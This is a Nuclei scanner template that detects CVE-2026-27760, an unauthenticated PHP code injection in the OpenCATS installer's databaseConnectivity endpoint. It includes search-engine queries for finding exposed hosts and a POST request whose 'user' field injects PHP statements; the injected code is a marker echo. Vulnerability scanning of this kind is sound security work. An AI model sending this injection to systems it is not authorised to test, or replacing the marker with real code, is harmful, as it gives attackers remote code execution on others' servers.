id: CVE-2026-27760 info: name: OpenCATS - Command Injection author: theamanrawat severity: high description: | OpenCATS prior to commit 3002a29 contains a command injection caused by injection of PHP statements into the installer AJAX endpoint's databaseConnectivity action parameter, letting unauthenticated attackers execute arbitrary code, exploit requires incomplete installation wizard. impact: | Unauthenticated attackers can execute arbitrary PHP code remotely, leading to full system compromise. remediation: | Update to the version after commit 3002a29 or latest available version. reference: - https://chocapikk.com/posts/2026/opencats-installer-rce/ - https://github.com/opencats/OpenCATS/commit/3002a29f4c3cada1aa2c4f3d4ae4e189906606b6 - https://github.com/opencats/OpenCATS - https://nvd.nist.gov/vuln/detail/CVE-2026-27760 classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2026-27760 epss-score: 0.22189 epss-percentile: 0.97382 cwe-id: CWE-94 metadata: verified: true max-request: 3 vendor: opencats product: opencats shodan-query: - title:"opencats" - http.title:"opencats" fofa-query: title="opencats" google-query: intitle:"opencats" tags: cve,cve2026,opencats,rce,vkev flow: http(1) && http(2) && http(3) http: - raw: - | GET /ajax.php?f=install:ui&a=databaseConnectivity HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - "!contains(body, 'installLocked')" - "contains(body, 'setActiveStep')" - "status_code == 200" condition: and internal: true - raw: - | POST /ajax.php?f=install:ui&a=databaseConnectivity HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded user=cats');echo+'{{randstr}}'.md5('{{randstr}}');// matchers: - type: dsl dsl: - "status_code == 200" internal: true - raw: - | GET /index.php HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: dsl dsl: - "contains(body, '{{randstr}}' + md5('{{randstr}}'))" - "status_code == 200" condition: and # digest: 4a0a004730450221009fdecfec069b5a87a51fb01c38546d0d9356227339f02ed45a0766e56273151902202c37edbdf754fbec694f3fcdeb14c09c750bde39b2958972a352c25c24f08a96:922c64590222798bb761d5b6d8e72950